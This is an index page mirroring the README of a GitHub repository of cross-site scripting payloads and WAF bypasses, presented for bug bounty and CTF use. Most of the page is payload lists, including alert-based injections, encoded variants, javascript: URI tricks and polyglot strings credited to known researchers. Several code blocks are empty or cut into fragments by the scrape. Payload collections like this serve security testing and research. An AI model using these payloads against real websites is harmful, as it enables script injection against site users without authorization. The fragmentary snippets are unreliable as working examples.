Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/R0X4R/D4rkXSS

A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF
https://github.com/R0X4R/D4rkXSS

bugbounty bughunter bughunting ethical-hacking hacking javascript xss-exploitation xss-filter xss-vulnerability

Last synced: 21 days ago
JSON representation

A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF

Awesome Lists containing this project

README

        

# D4rkXSS





All in one place for XSS.
R0X4R

# Contribution
This is an open source repo. Anyone can contribute. :beers:

[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/R0X4R)

## Bypass WAF
NO SCRIPT

  • For Example:
  • ```js




    ">'>
    incapsula bypass:
    ```

    Brutelogic

  • For Example:
  • ```
    \'-alert(1)//

    lose focus!
    ```
    Fuzz3r

  • For Example:
  • ```
    #getURL,javascript:alert(1)",
    #goto,javascript:alert(1)",
    ?javascript:alert(1)",

    ```
    ## IMG Error

  • Encoding
  • ```




    ```

    ## Jhaddix
    Jhaddix

  • For Example:
  • ```
    '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
    <RSnake

  • For Example:
  • ```
    alert('XSS');
    '';!--"=&{()}

    ```

    ## MarioXSS
    Mario

  • For Example:
  • ```

    X//["'`-->]]>]
    &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]
    &alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>
    ```
    ## Search Engine XSS
    <a href="https://github.com/R0X4R/D4rkXSS/blob/master/seXSS.md">seXSS</a><br/>

    ## Misc Payloads
    <a href="https://github.com/R0X4R/D4rkXSS/blob/master/Misc.md">Misc</a><br/>

    ## Basic Payloads
    <a href="https://github.com/R0X4R/D4rkXSS/blob/master/basicxss.txt">Basic</a><br/>
    <li>For Example:</li>

    ```
    <script>alert('1')
    ">alert('1')